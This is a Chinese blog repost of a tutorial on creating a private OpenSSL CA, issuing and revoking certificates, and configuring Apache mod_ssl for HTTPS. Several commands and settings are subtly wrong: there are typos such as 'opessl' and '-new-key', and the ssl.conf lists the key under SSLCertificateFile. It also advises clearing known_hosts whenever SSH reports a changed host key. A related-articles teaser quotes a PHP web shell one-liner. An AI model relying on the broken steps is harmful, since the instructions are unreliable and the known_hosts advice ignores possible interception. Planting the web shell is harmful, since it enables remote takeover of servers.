专栏首页北京马哥教育openssl创建CA、申请证书及其给web服务颁发证书

openssl创建CA、申请证书及其给web服务颁发证书

一、创建私有的CA

1)查看openssl的配置文件:/etc/pki/tls/openssl.cnf

2)创建所需的文件

touch /etc/pki/CA/index.txt echo 01 >/etc/pki/CA/serial

3)CA自签证书生成私钥

cd /etc/pki/CA

(umask 066;openssl genrsa -out /etc/pki/CA/private/cakey.pem 2048)

4)生成自签名证书

openssl req -new -x509 -key /etc/pki/CA/private/cakey.pem -days 7300 -out /etc/pki/CA/cacert.pem

-new:生成新的证书签署请求

-x509:专用CA生成自签证书

-key:生成请求时用到的私钥文件

-days n:证书的有限期

-out /path/to/somecertfile:证书的保存路径

代码演示:

二、颁发及其吊销证书

1)颁发证书,在需要使用证书的主机生成证书请求,给web服务器生成私钥(本实验在另一台主机上)

(umask 066;openssl genrsa -out /etc/httpd/ssl/httpd.key 2048)

2)生成证书申请文件

openssl req -new-key /etc/httpd/ssl/httpd.key -days 365 -out /etc/httpd/ssl/httpd.csr

3)将证书文件传给CA,CA签署证书并将证书颁发给请求者,注意:默认国家、省和公司必须和CA一致

openssl ca -in /tmp/httpd.csr -out /etc/pki/CA/certs/httpd.crt -days 365

4)查看证书中的信息

opessl x509 -in /path/from/cert_file -noout -text|sbuject|serial|dates

5)吊销证书,在客户端获取要吊销的证书的serial

openssl x509 -in /PATH/FROM/CERT_FILE -noout -serial -subject

6)在CA上,根据客户提交的serial与subject信息,对比检验 是否与index.txt文件中的信息一致吊销证书

openssl ca -revoke /etc/pki/CA/newcerts/ SERIAL.pem

7)生成吊销证书的编号(第一次吊销一个证书时才需要执行)

echo 01 > /etc/pki/CA/crlnumber

8)更新证书吊销列表,查看crl文件

openssl ca -gencrl -out /etc/pki/CA/crl/ca.crl

openssl crl -in /etc/pki/CA/crl/ca.crl -noout -text

9)安装mod_ssl模块并修改/etc/httpd/conf.d/ssl.conf配置文件

DocumentRoot "/web/pma"

ServerName www.chen.net:443

<Directory "/web/pma">

AllowOverride All

Options None

require all granted

</Directory>

SSLCertificateFile /etc/httpd/ssl/httpd.crt

SSLCertificateFile /etc/httpd/ssl/httpd.key

图示:

授权目录

10)测试

openssl s_client [-connect host:port] [-cert filename] [-CApath directory] [-CAfile filename]

实例:

openssl s_client -connect www.chen.net:443 -CAfile /etc/pki/CA/cacert.pem

curl --cacert /etc/pki/CA/cacert.pem https://www.chen.net/

实现图示:

代码演示:

不同主机之间拷贝文件小技巧:

在使用ssh远程登录时提示:remote host indentification has changed!则需清除~/.ssh/known_hosts文件即可,因为系统检测出rsa钥匙发生了改变。清除此配置文件重连。

作者:小耳朵

来源:http://purify.blog.51cto.com/10572011/1856060

本文分享自微信公众号 - 马哥Linux运维(magedu-Linux),作者:马哥教育

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-01-07

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 如何用sosreport在Linux上创建诊断报告

    Sosreport是RHEL / CentOS上的一个命令,它会收集系统配置和你linux机器上的诊断信息,如正在运行的内核版本、加载的模块和系统和服务配置文...

    小小科
  • 黑客常用linux入侵常用命令,有你不知道的没?

    [jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog...

    小小科
  • Python3急速入门(三)函数与lambda表达式、闭包

    函数 是组织好的、可重复使用的、用来实现单一或相关联功能的代码段。 函数代码块以def关键词开头,后接函数标识符名称和圆括号() 任何传入参数和自变量必须放在圆...

    小小科
  • CA中心构建及证书签发实录

    本实验中,我们将通过开源工具OpenSSL构建一个私有CA中心,并以其为根CA,设立一个子CA机构,并为Client提供证书签署服务。

    用户1456517
  • 斯诺登称NSA安全项目或误伤普通网络用户

    美国国家安全局(NSA)前雇员爱德华·斯诺登(Edward Snowden)近期表示,美国政府正在推进一个名为“MonsterMind”的信息安...

    安恒信息
  • 【HDU 6036】Division Game (NTT+数学)

    饶文津
  • R语言从入门到精通:Day6

    距离上次R语言系列更新已经过去快一周了,先跟大家说声不好意思,实话实说更新速度的确慢了一点

    用户6317549
  • 利用httpd+openssl来实现网站的https

                                            CA验证中心(颁发/吊销证书)                       ...

    DevinGeng
  • C++ 类成员变量初始化

    本文是对《Effective C++》的”Item 4: Make sure that objects are initialized before they’...

    mzlogin
  • 开往春天的 Feflow - 全新架构设计

    Feflow是一个用于提升开发效率的前端工作流和规范工具,最新版本是v0.16.0,目前在 alpha 阶段,托管在Github上:Tencent/feflow...

    腾讯IVWEB团队

扫码关注云+社区

领取腾讯云代金券